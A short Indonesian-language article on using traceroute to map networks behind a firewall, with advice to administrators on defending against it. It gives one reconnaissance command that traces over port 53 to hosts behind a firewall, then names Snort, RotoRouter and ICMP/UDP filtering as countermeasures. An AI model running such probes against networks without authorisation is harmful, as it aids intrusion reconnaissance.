Biasanya jaringan IntraNet 192.168.x.x & 10.x.x.x, harusnya tertutup untuk dilihat oleh publik. Jika perancang jaringan tersebut secara benar merancang jaringannya akan sangat sulit melakukan penetrasi jaringan menggunakan traceroute. Salah satu cara untuk melakukan traceroute menembus IntraNet, adalah dengan melakukan traceroute pada port tertentu, misalnya port 53 yang merupakan port Domain Name System (DNS) menggunakan perintah:

# traceroute –s –P53 IP_mesin_tujuan_dibalik_firewall

Bagi para administrator jaringan, tentunya akan sangat menyakitkan jika mengetahui bahwa jaringan-nya di intai oleh para hacker menggunakan traceroute. Ada beberapa software yang dapat digunakan untuk menipu / membatasi proses pengintaian tersebut, seperti snort (http://www.snort.org) yang merupakan software untuk melakukan Network Intrusion Detection System (NIDS). Kalau mau lebih jail lagi mungkin bisa menggunakan RotoRouter (http://packetstorm.securify.com/linux/trinux/src/rr-1.0.tgz) yang dapat mengirimkan responds palsu terhadap program yang melakukan tracreroute. Selain itu, anda juga dapat membatasi router-router yang ada di luar jaringan untuk membatasi traffik ICMP & UDP ke sistem yang spesifik, yang akhirnya akan mengurangi keterbukaan jaringan anda ke luar.